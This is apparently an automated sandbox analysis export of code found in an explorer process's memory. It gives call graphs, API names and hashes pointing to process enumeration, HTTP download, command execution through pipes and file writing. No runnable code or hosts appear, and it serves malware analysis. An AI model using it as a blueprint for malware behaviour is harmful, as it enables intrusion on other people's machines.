89dcfaa 3838 89d82b4 NtFreeVirtualMemory 3837->3838 3838->3836 3839 89d82b4 NtFreeVirtualMemory 3839->3840 3840->3837 3840->3839 3843 89dce04 3841->3843 3842 89db388 NtAllocateVirtualMemory 3845 89dce6b 3842->3845 3843->3842 3844 89dce3b 3843->3844 3844->3796 3845->3844 3846 89dbfc0 NtAllocateVirtualMemory 3845->3846 3847 89dce9d 3846->3847 3848 89db388 NtAllocateVirtualMemory 3847->3848 3849 89dcebc 3848->3849 3849->3844 3850 89d82b4 NtFreeVirtualMemory 3849->3850 3850->3844 3886 89d44ec 3851->3886 3852 89d4799 3856 89d47a4 3852->3856 3857 89d4852 3852->3857 3853 89d47e3 3854 89d47ee 3853->3854 3855 89d4900 3853->3855 3866 89d49ec 3854->3866 3867 89d480f 3854->3867 3879 89d47de 3854->3879 3914 89d4334 3855->3914 3859 89d494c 3856->3859 3860 89d47af 3856->3860 3865 89dbfc0 NtAllocateVirtualMemory 3857->3865 3968 89d2b28 3859->3968 3863 89d47ba 3860->3863 3864 89d4931 3860->3864 3862 89d4905 3862->3879 3919 89dc704 NtDelayExecution 3862->3919 3868 89d47c5 3863->3868 3869 89d4942 3863->3869 3935 89d2d50 CreateToolhelp32Snapshot 3864->3935 3887 89d4870 3865->3887 3988 89d7dfc 3866->3988 3872 89d49f8 3867->3872 3873 89d481a 3867->3873 3876 89d47cc 3868->3876 3877 89d483e 3868->3877 3967 89d321c CreateThread 3869->3967 3872->3879 3999 89d7f54 3872->3999 3873->3879 4012 89d4a20 3873->4012 3880 89d491d 3876->3880 3881 89d47d7 3876->3881 3902 89d7940 3877->3902 3879->3796 3920 89d7768 3880->3920 3881->3879 3889 89d7c98 3881->3889 3886->3852 3886->3853 3887->3879 3888 89d82b4 NtFreeVirtualMemory 3887->3888 3888->3879 3890 89d7cb7 3889->3890 3891 89d7cc4 MultiByteToWideChar 3890->3891 4020 89d7a84 3891->4020 3894 89d7ddf 3895 89d82b4 NtFreeVirtualMemory 3894->3895 3901 89d7dd8 3894->3901 3895->3901 3896 89d7d4b VirtualAlloc 3897 89d7d7e 3896->3897 3898 89db388 NtAllocateVirtualMemory 3897->3898 3899 89d7d88 CreateThread 3898->3899 3900 89d82b4 NtFreeVirtualMemory 3899->3900 3900->3901 3901->3879 4109 89d830c 3902->4109 3904 89d7963 3905 89d8bdc 3 API calls 3904->3905 3912 
89d7970 3904->3912 3906 89d79ba wsprintfW 3905->3906 3907 89d82b4 NtFreeVirtualMemory 3906->3907 3908 89d79df 3907->3908 3909 89d7a07 MultiByteToWideChar 3908->3909 3910 89d7a84 21 API calls 3909->3910 3911 89d7a4f 3910->3911 3911->3912 4117 89db8d4 3911->4117 3912->3879 3915 89d434a SetEvent 3914->3915 3916 89d4357 3914->3916 3915->3916 3917 89d437b 3916->3917 3918 89d4361 ReleaseMutex CloseHandle 3916->3918 3917->3862 3918->3917 3919->3862 3921 89d77a7 3920->3921 3922 89d830c 4 API calls 3921->3922 3924 89d77d3 3922->3924 3923 89d77e0 3923->3879 3924->3923 3925 89d8bdc 3 API calls 3924->3925 3926 89d782a wsprintfW 3925->3926 3927 89d82b4 NtFreeVirtualMemory 3926->3927 3928 89d784f 3927->3928 3929 89d7874 MultiByteToWideChar 3928->3929 3930 89d7a84 21 API calls 3929->3930 3931 89d78b9 3930->3931 3932 89d78d9 MultiByteToWideChar 3931->3932 3932->3923 3933 89d790d 3932->3933 3933->3923 4122 89db9a0 3933->4122 3936 89db388 NtAllocateVirtualMemory 3935->3936 3937 89d2d94 3936->3937 3938 89dbe64 3 API calls 3937->3938 3939 89d2ddd 3938->3939 3940 89d2de9 Process32First 3939->3940 3941 89d31fb 3939->3941 3942 89d2e34 3940->3942 3943 89d2e13 Process32Next 3940->3943 3944 89dbe64 3 API calls 3941->3944 3946 89db388 NtAllocateVirtualMemory 3942->3946 3943->3942 3943->3943 3945 89d320c 3944->3945 3945->3879 3947 89d2e44 Process32First 3946->3947 3948 89d2ead Process32First 3947->3948 3949 89d2e60 3947->3949 3951 89d31e6 3948->3951 3955 89d2ec8 3948->3955 3950 89d2e68 Process32Next 3949->3950 3950->3948 3950->3950 3952 89d82b4 NtFreeVirtualMemory 3951->3952 3953 89d31f0 CloseHandle 3952->3953 3953->3941 3954 89d31cb Process32Next 3954->3951 3954->3955 3955->3954 3956 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3955->3956 3957 89d2fe0 wsprintfA 3955->3957 3956->3955 3958 89dbe64 3 API calls 3957->3958 3960 89d300d 3958->3960 3959 89dbe64 3 API calls 3959->3960 3960->3959 3961 89d3086 wsprintfA 3960->3961 3962 89dbe64 3 API calls 3961->3962 3965 89d30b3 
3962->3965 3964 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 3964->3965 3965->3964 3966 89dbe64 3 API calls 3965->3966 4131 89d260c CreateToolhelp32Snapshot 3965->4131 3966->3954 3967->3879 3969 89db388 NtAllocateVirtualMemory 3968->3969 3970 89d2b3b 3969->3970 3971 89dbe64 3 API calls 3970->3971 3972 89d2b7b 3971->3972 4147 89d8398 3972->4147 3974 89d2cf3 3975 89d82b4 NtFreeVirtualMemory 3974->3975 3977 89d2d05 3974->3977 3975->3977 3976 89d2b8e 3976->3974 3978 89dbe64 3 API calls 3976->3978 3979 89dbe64 3 API calls 3977->3979 3980 89d2bda FindFirstFileA 3978->3980 3981 89d2d40 3979->3981 3980->3974 3987 89d2bfe 3980->3987 3981->3879 3982 89d2ccd FindNextFileA 3983 89d2ce8 FindClose 3982->3983 3982->3987 3983->3974 3984 89dbe64 3 API calls 3984->3987 3985 89d2c98 wsprintfA 3986 89dbe64 3 API calls 3985->3986 3986->3987 3987->3982 3987->3984 3987->3985 3989 89d7e17 3988->3989 3990 89d7e24 MultiByteToWideChar 3989->3990 3991 89d7a84 21 API calls 3990->3991 3993 89d7e75 3991->3993 3992 89d7f40 3992->3879 3993->3992 3994 89db388 NtAllocateVirtualMemory 3993->3994 3995 89d7eb6 3994->3995 3996 89db388 NtAllocateVirtualMemory 3995->3996 3997 89d7ed9 CreateThread 3996->3997 3998 89d82b4 NtFreeVirtualMemory 3997->3998 3998->3992 4000 89d7f6f 3999->4000 4001 89d7f7c MultiByteToWideChar 4000->4001 4002 89d7a84 21 API calls 4001->4002 4004 89d7fcd 4002->4004 4003 89d80a4 4003->3879 4004->4003 4005 89db388 NtAllocateVirtualMemory 4004->4005 4006 89d800e 4005->4006 4155 89dc7dc 4006->4155 4009 89db388 NtAllocateVirtualMemory 4010 89d803d CreateThread 4009->4010 4011 89d82b4 NtFreeVirtualMemory 4010->4011 4011->4003 4017 89d4a2c 4012->4017 4013 89d4acc 4013->3879 4014 89d4aec MultiByteToWideChar 4015 89d830c 4 API calls 4014->4015 4015->4017 4016 89d4b7d MultiByteToWideChar 4016->4017 4017->4013 4017->4014 4017->4016 4018 89d4bd6 wsprintfW 4017->4018 4019 89d7a84 21 API calls 4018->4019 4019->4017 4029 89d7ac4 4020->4029 4022 89d7b28 4023 89d7c5d 4022->4023 
4024 89d82b4 NtFreeVirtualMemory 4022->4024 4025 89d7c68 4023->4025 4026 89d82b4 NtFreeVirtualMemory 4023->4026 4024->4023 4025->3894 4025->3896 4026->4025 4027 89dc00c NtAllocateVirtualMemory 4027->4029 4029->4022 4029->4027 4031 89d900c 4029->4031 4051 89d76d8 4029->4051 4063 89d8240 4029->4063 4032 89d904b InternetOpenW 4031->4032 4033 89d908b 4032->4033 4034 89d9086 4032->4034 4069 89d55dc 4033->4069 4036 89d923d InternetCloseHandle 4034->4036 4037 89d9248 4034->4037 4036->4037 4039 89d925b 4037->4039 4040 89d9250 InternetCloseHandle 4037->4040 4039->4029 4040->4039 4041 89d90f4 4043 89d9106 4041->4043 4044 89d82b4 NtFreeVirtualMemory 4041->4044 4045 89d9118 InternetOpenUrlW 4043->4045 4046 89d82b4 NtFreeVirtualMemory 4043->4046 4044->4043 4045->4034 4048 89d9154 4045->4048 4046->4045 4047 89d915f InternetReadFile 4047->4048 4048->4034 4048->4047 4049 89db648 3 API calls 4048->4049 4050 89db388 NtAllocateVirtualMemory 4048->4050 4049->4048 4050->4048 4091 89d92f8 4051->4091 4056 89d774e 4058 89d76fb 4056->4058 4060 89d82b4 NtFreeVirtualMemory 4056->4060 4057 89dbf78 3 API calls 4059 89d7729 4057->4059 4058->4029 4059->4056 4061 89d772d 4059->4061 4060->4058 4062 89d82b4 NtFreeVirtualMemory 4061->4062 4062->4058 4103 89d80b8 4063->4103 4066 89d827f 4066->4029 4070 89d5614 4069->4070 4071 89db388 NtAllocateVirtualMemory 4070->4071 4072 89d563a 4071->4072 4073 89db388 NtAllocateVirtualMemory 4072->4073 4074 89d5650 InternetCrackUrlW 4073->4074 4075 89d56ac 4074->4075 4076 89d56c6 4074->4076 4077 89d82b4 NtFreeVirtualMemory 4075->4077 4076->4034 4076->4041 4080 89dc860 4076->4080 4078 89d56b9 4077->4078 4079 89d82b4 NtFreeVirtualMemory 4078->4079 4079->4076 4081 89dc8df 4080->4081 4082 89dc894 InternetConnectW 4080->4082 4083 89dc9d5 InternetCloseHandle 4081->4083 4084 89dc9e0 4081->4084 4082->4081 4085 89dc8e4 HttpOpenRequestW 4082->4085 4083->4084 4087 89dc9e8 InternetCloseHandle 4084->4087 4088 89dc9f3 4084->4088 4085->4081 4086 89dc936 HttpSendRequestW 
4085->4086 4089 89dc955 InternetQueryOptionW InternetSetOptionW 4086->4089 4090 89dc9a7 HttpSendRequestW 4086->4090 4087->4088 4088->4041 4089->4090 4090->4081 4092 89dc00c NtAllocateVirtualMemory 4091->4092 4094 89d9318 4092->4094 4093 89d76f7 4093->4058 4096 89dbf78 4093->4096 4094->4093 4095 89d82b4 NtFreeVirtualMemory 4094->4095 4095->4093 4097 89dbf90 4096->4097 4100 89dbf0c 4097->4100 4099 89d7713 4099->4056 4099->4057 4101 89db704 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4100->4101 4102 89dbf40 4101->4102 4102->4099 4104 89d80f9 4103->4104 4105 89d810b RtlInitUnicodeString NtCreateFile 4104->4105 4106 89d81b1 4105->4106 4106->4066 4107 89d81c8 NtWriteFile 4106->4107 4108 89d8230 NtClose 4107->4108 4108->4066 4110 89db470 4109->4110 4111 89d8326 SHGetFolderPathW 4110->4111 4112 89d834f 4111->4112 4113 89dc00c NtAllocateVirtualMemory 4112->4113 4115 89d835b 4113->4115 4114 89d8368 4114->3904 4115->4114 4116 89dbf78 3 API calls 4115->4116 4116->4114 4118 89db8ee 4117->4118 4119 89db926 CreateProcessW 4118->4119 4120 89db97a CloseHandle CloseHandle 4119->4120 4121 89db976 4119->4121 4120->4121 4121->3912 4123 89db9c0 4122->4123 4124 89dba78 4123->4124 4125 89dba1e 4123->4125 4127 89dbaad wsprintfW 4124->4127 4126 89dba53 wsprintfW 4125->4126 4128 89dbac8 CreateProcessW 4126->4128 4127->4128 4129 89dbb1f CloseHandle CloseHandle 4128->4129 4130 89dbb1b 4128->4130 4129->4130 4130->3923 4132 89d297e 4131->4132 4133 89d2659 Process32First 4131->4133 4132->3965 4133->4132 4136 89d267f 4133->4136 4134 89d2963 Process32Next 4134->4132 4134->4136 4135 89dbe64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4135->4136 4136->4134 4136->4135 4137 89d279f wsprintfA 4136->4137 4138 89dbe64 3 API calls 4137->4138 4140 89d27cf 4138->4140 4139 89dbe64 3 API calls 4139->4140 4140->4139 4141 89d2839 wsprintfA 4140->4141 4142 89dbe64 3 API calls 4141->4142 4145 89d2869 4142->4145 4143 89d260c 3 API calls 4143->4145 4144 89dbe64 NtFreeVirtualMemory 
NtAllocateVirtualMemory VirtualQuery 4144->4145 4145->4143 4145->4144 4146 89dbe64 3 API calls 4145->4146 4146->4134 4148 89db470 4147->4148 4149 89d83b2 SHGetFolderPathA 4148->4149 4150 89d83db 4149->4150 4151 89dbfc0 NtAllocateVirtualMemory 4150->4151 4153 89d83e7 4151->4153 4152 89d83f4 4152->3976 4153->4152 4154 89dbe64 3 API calls 4153->4154 4154->4152 4156 89d8033 4155->4156 4157 89dc7ef 4155->4157 4156->4009 4158 89db388 NtAllocateVirtualMemory 4157->4158 4158->4156 4160 89d4411 4159->4160 4161 89dbfc0 NtAllocateVirtualMemory 4160->4161 4165 89d4444 4161->4165 4162 89d4451 4163 89d44a4 4164 89d82b4 NtFreeVirtualMemory 4163->4164 4164->4162 4165->4162 4165->4163 4166 89d448f MessageBoxA 4165->4166 4166->4163 4167 89d4384 4168 89d43a7 4167->4168 4169 89d43a5 4167->4169 4171 89d43c4 4168->4171 4172 89d41b4 129 API calls 4171->4172 4173 89d43cd 4172->4173 4174 89d43eb 4173->4174 4176 89dc704 NtDelayExecution 4173->4176 4174->4169 4176->4173 4177 89d3304 4178 89d3349 4177->4178 4235 89d3322 4177->4235 4179 89db388 NtAllocateVirtualMemory 4178->4179 4180 89d3353 4179->4180 4180->4235 4295 89d2164 4180->4295 4182 89d3406 4183 89d2164 21 API calls 4182->4183 4184 89d349e 4183->4184 4185 89d2164 21 API calls 4184->4185 4186 89d3537 4185->4186 4187 89d2164 21 API calls 4186->4187 4188 89d35d0 4187->4188 4189 89d2164 21 API calls 4188->4189 4190 89d3669 4189->4190 4191 89d2164 21 API calls 4190->4191 4192 89d3702 4191->4192 4193 89d2164 21 API calls 4192->4193 4194 89d379b 4193->4194 4195 89d2164 21 API calls 4194->4195 4196 89d3834 4195->4196 4197 89d2164 21 API calls 4196->4197 4198 89d38cd 4197->4198 4199 89d2164 21 API calls 4198->4199 4200 89d3966 4199->4200 4201 89d2164 21 API calls 4200->4201 4202 89d39ff 4201->4202 4203 89db388 NtAllocateVirtualMemory 4202->4203 4204 89d3a12 4203->4204 4205 89d6fc0 NtAllocateVirtualMemory 4204->4205 4206 89d3ad6 4204->4206 4204->4235 4213 89d3a63 4205->4213 4207 89d3b77 4206->4207 4208 89d6fc0 NtAllocateVirtualMemory 4206->4208 
4209 89d3c18 4207->4209 4210 89d6fc0 NtAllocateVirtualMemory 4207->4210 4217 89d3b04 4208->4217 4211 89d3cb9 4209->4211 4212 89d6fc0 NtAllocateVirtualMemory 4209->4212 4221 89d3ba5 4210->4221 4214 89d6fc0 NtAllocateVirtualMemory 4211->4214 4215 89d3d5a 4211->4215 4223 89d3c46 4212->4223 4213->4206 4226 89dbe64 3 API calls 4213->4226 4230 89d3ce7 4214->4230 4216 89d6fc0 NtAllocateVirtualMemory 4215->4216 4218 89d3dfb 4215->4218 4233 89d3d88 4216->4233 4217->4207 4229 89dbe64 3 API calls 4217->4229 4219 89d3e9c 4218->4219 4220 89d6fc0 NtAllocateVirtualMemory 4218->4220 4222 89d6fc0 NtAllocateVirtualMemory 4219->4222 4225 89d3f3d 4219->4225 4243 89d3e29 4220->4243 4221->4209 4238 89dbe64 3 API calls 4221->4238 4246 89d3eca 4222->4246 4223->4211 4240 89dbe64 3 API calls 4223->4240 4224 89d4138 4317 89d2988 4224->4317 4227 89d3fde 4225->4227 4231 89d6fc0 NtAllocateVirtualMemory 4225->4231 4232 89d3abd 4226->4232 4234 89d6fc0 NtAllocateVirtualMemory 4227->4234 4237 89d408b 4227->4237 4236 89d3b5e 4229->4236 4230->4215 4249 89dbe64 3 API calls 4230->4249 4255 89d3f6b 4231->4255 4239 89dbe64 3 API calls 4232->4239 4233->4218 4252 89dbe64 3 API calls 4233->4252 4258 89d400c 4234->4258 4241 89dbe64 3 API calls 4236->4241 4237->4224 4242 89d6fc0 NtAllocateVirtualMemory 4237->4242 4244 89d3bff 4238->4244 4245 89d3acc 4239->4245 4247 89d3ca0 4240->4247 4248 89d3b6d 4241->4248 4267 89d40b9 4242->4267 4243->4219 4261 89dbe64 3 API calls 4243->4261 4250 89dbe64 3 API calls 4244->4250 4251 89d82b4 NtFreeVirtualMemory 4245->4251 4246->4225 4264 89dbe64 3 API calls 4246->4264 4253 89dbe64 3 API calls 4247->4253 4254 89d82b4 NtFreeVirtualMemory 4248->4254 4256 89d3d41 4249->4256 4257 89d3c0e 4250->4257 4251->4206 4259 89d3de2 4252->4259 4260 89d3caf 4253->4260 4254->4207 4255->4227 4272 89dbe64 3 API calls 4255->4272 4262 89dbe64 3 API calls 4256->4262 4263 89d82b4 NtFreeVirtualMemory 4257->4263 4258->4237 4275 89dbe64 3 API calls 4258->4275 4265 89dbe64 3 API calls 4259->4265 4266 
89d82b4 NtFreeVirtualMemory 4260->4266 4268 89d3e83 4261->4268 4269 89d3d50 4262->4269 4263->4209 4270 89d3f24 4264->4270 4271 89d3df1 4265->4271 4266->4211 4267->4224 4282 89dbe64 3 API calls 4267->4282 4273 89dbe64 3 API calls 4268->4273 4274 89d82b4 NtFreeVirtualMemory 4269->4274 4276 89dbe64 3 API calls 4270->4276 4277 89d82b4 NtFreeVirtualMemory 4271->4277 4278 89d3fc5 4272->4278 4279 89d3e92 4273->4279 4274->4215 4280 89d406c 4275->4280 4281 89d3f33 4276->4281 4277->4218 4283 89dbe64 3 API calls 4278->4283 4284 89d82b4 NtFreeVirtualMemory 4279->4284 4285 89dbe64 3 API calls 4280->4285 4286 89d82b4 NtFreeVirtualMemory 4281->4286 4287 89d4119 4282->4287 4288 89d3fd4 4283->4288 4284->4219 4291 89d407e 4285->4291 4286->4225 4289 89dbe64 3 API calls 4287->4289 4290 89d82b4 NtFreeVirtualMemory 4288->4290 4292 89d412b 4289->4292 4290->4227 4293 89d82b4 NtFreeVirtualMemory 4291->4293 4294 89d82b4 NtFreeVirtualMemory 4292->4294 4293->4237 4294->4224 4296 89d21e4 4295->4296 4297 89d21f6 6 API calls 4296->4297 4343 89d2134 4297->4343 4299 89d2333 CreateProcessW 4300 89db388 NtAllocateVirtualMemory 4299->4300 4301 89d2399 4300->4301 4302 89db388 NtAllocateVirtualMemory 4301->4302 4311 89d23d6 4302->4311 4303 89d25e8 4306 89d25fa 4303->4306 4308 89d82b4 NtFreeVirtualMemory 4303->4308 4304 89d2401 PeekNamedPipe 4307 89d24b9 PeekNamedPipe 4304->4307 4304->4311 4305 89d25a0 TerminateProcess CloseHandle CloseHandle CloseHandle CloseHandle 4305->4303 4306->4182 4309 89d2569 GetExitCodeProcess 4307->4309 4307->4311 4308->4306 4310 89d258f 4309->4310 4309->4311 4310->4305 4311->4303 4311->4304 4311->4305 4311->4307 4311->4309 4313 89d2468 ReadFile 4311->4313 4315 89d2518 ReadFile 4311->4315 4344 89dc704 NtDelayExecution 4311->4344 4314 89dbe64 3 API calls 4313->4314 4314->4307 4316 89dbe64 3 API calls 4315->4316 4316->4309 4318 89d299d 4317->4318 4342 89d2b17 4317->4342 4319 89d29ca 4318->4319 4320 89d82b4 NtFreeVirtualMemory 4318->4320 4318->4342 4321 89d82b4 
NtFreeVirtualMemory 4319->4321 4322 89d29ea 4319->4322 4320->4319 4321->4322 4323 89d2a0a 4322->4323 4324 89d82b4 NtFreeVirtualMemory 4322->4324 4325 89d2a2a 4323->4325 4326 89d82b4 NtFreeVirtualMemory 4323->4326 4324->4323 4327 89d2a4a 4325->4327 4328 89d82b4 NtFreeVirtualMemory 4325->4328 4326->4325 4329 89d2a6a 4327->4329 4330 89d82b4 NtFreeVirtualMemory 4327->4330 4328->4327 4331 89d2a8a 4329->4331 4332 89d82b4 NtFreeVirtualMemory 4329->4332 4330->4329 4333 89d2aaa 4331->4333 4334 89d82b4 NtFreeVirtualMemory 4331->4334 4332->4331 4335 89d2aca 4333->4335 4336 89d82b4 NtFreeVirtualMemory 4333->4336 4334->4333 4337 89d2aea 4335->4337 4339 89d82b4 NtFreeVirtualMemory 4335->4339 4336->4335 4338 89d2b0a 4337->4338 4340 89d82b4 NtFreeVirtualMemory 4337->4340 4341 89d82b4 NtFreeVirtualMemory 4338->4341 4339->4337 4340->4338 4341->4342 4342->4235 4343->4299 4344->4311 4378 89dbb44 4379 89dbbc5 4378->4379 4380 89dbb62 4378->4380 4381 89dbb8e CreateFileMappingA 4380->4381 4381->4379 4382 89dbbcc MapViewOfFile 4381->4382 4382->4379 4384 89dbbff 4382->4384 4383 89dbcd5 VirtualFree 4385 89d82b4 NtFreeVirtualMemory 4383->4385 4384->4383 4387 89db388 NtAllocateVirtualMemory 4384->4387 4386 89dbd06 UnmapViewOfFile CloseHandle 4385->4386 4386->4379 4388 89dbc35 4387->4388 4389 89dbe64 3 API calls 4388->4389 4390 89dbc87 4389->4390 4391 89dbe64 3 API calls 4390->4391 4392 89dbc99 4391->4392 4393 89dbfc0 NtAllocateVirtualMemory 4392->4393 4394 89dbcaf 4393->4394 4395 89d82b4 NtFreeVirtualMemory 4394->4395 4396 89dbccb 4395->4396 4397 89d82b4 NtFreeVirtualMemory 4396->4397 4397->4383 4398 89dc5c0 4399 89dc5de 4398->4399 4402 89dc641 4398->4402 4400 89dc60a CreateFileMappingA 4399->4400 4401 89dc648 MapViewOfFile 4400->4401 4400->4402 4401->4402 4403 89dc67b 4401->4403 4408 89dca9c 4403->4408 4406 89d82b4 NtFreeVirtualMemory 4407 89dc6d1 UnmapViewOfFile CloseHandle 4406->4407 4407->4402 4409 89dcaad 4408->4409 4410 89dc6a0 VirtualFree 4408->4410 4414 89dca68 4409->4414 4410->4406 
4413 89d82b4 NtFreeVirtualMemory 4413->4410 4415 89dca7d 4414->4415 4416 89dca8b 4414->4416 4417 89dca68 NtFreeVirtualMemory 4415->4417 4418 89d82b4 NtFreeVirtualMemory 4416->4418 4417->4416 4419 89dca95 4418->4419 4419->4413

Control-flow Graph (entry block 89d8424-89d845d; legend: Executed / Not Executed)
APIs
  • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
• GetAdaptersInfo.IPHLPAPI ref: 089D8470
• GetAdaptersInfo.IPHLPAPI ref: 089D84A7
• wsprintfA.USER32 ref: 089D84F0
• wsprintfA.USER32 ref: 089D85DB
• wsprintfA.USER32 ref: 089D863F
Strings
Memory Dump Source
• Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
Similarity
• API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
• String ID: o
• API String ID: 2074107575-252678980
• Opcode ID: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction ID: 9aabffb3e629938986ff651f1076437bae3f88982201b6ffaeb179c01593eb57
• Opcode Fuzzy Hash: 74334035a4c2000bc66b90e9c9b675ea5675b32aeaf99ff9f650a8c8c6a1f5dc
• Instruction Fuzzy Hash: 7EA12076209B84CADB60EB15F48036AB7A4F7C8799F448529EACE93B59DF3CC544CB04

Control-flow Graph (entry block 89d7274-89d72ab; legend: Executed / Not Executed)
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D729C
                                                                                                                                                                                                                              • Part of subcall function 089DB388: NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 089D72C7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                                                                                                            • String ID: o
                                                                                                                                                                                                                            • API String ID: 2718687846-252678980

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 179 89da8e0-89da8fb call 89d8cf0 182 89da8fd-89da8ff 179->182 183 89da904-89da918 call 89db4cc 179->183 184 89daa04-89daa0b 182->184 187 89da91a-89da924 183->187 188 89da926-89da92b 183->188 189 89da930-89da941 call 89dbf78 187->189 188->189 192 89da94a-89da983 call 89db470 FindFirstFileW 189->192 193 89da943-89da945 189->193 196 89da9f5-89da9ff call 89d82b4 192->196 197 89da985-89da98a 192->197 193->184 196->184 197->196 198 89da98c-89da9a1 FindNextFileW 197->198 201 89da9a5-89da9ab 198->201 202 89da9a3 198->202 203 89da9ad 201->203 204 89da9af-89da9dc call 89dc144 call 89d7430 201->204 202->196 203->196 209 89da9de-89da9f1 LoadLibraryW 204->209 210 89da9f3 204->210 209->196 210->197
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2188284642-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 221 89db388-89db3c6 NtAllocateVirtualMemory 222 89db3c8-89db3d2 call 89db470 221->222 223 89db3d7-89db3e0 221->223 222->223
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 089DB3BE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                            • API String ID: 2167126740-2766056989

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 243 89d5078-89d50ba 244 89d50bc-89d50dc InternetReadFile 243->244 245 89d514f 244->245 246 89d50de-89d50e3 244->246 247 89d5154-89d515c 245->247 246->245 248 89d50e5-89d5102 call 89db704 246->248 251 89d5108-89d514a call 89db3e4 248->251 252 89d5104-89d5106 248->252 251->244 252->247
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 778332206-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 296 89d82b4-89d82cc 297 89d82ef-89d82f3 296->297 298 89d82ce-89d82eb NtFreeVirtualMemory 296->298 298->297
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeMemoryVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3963845541-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 299 89dc704-89dc730 NtDelayExecution
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DelayExecution
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1249177460-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 0000001E.00000002.2587783671.00000000089D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 089D0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_30_2_89d0000_explorer.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:

                                                                                                                                                                                                                            Control-flow Graph

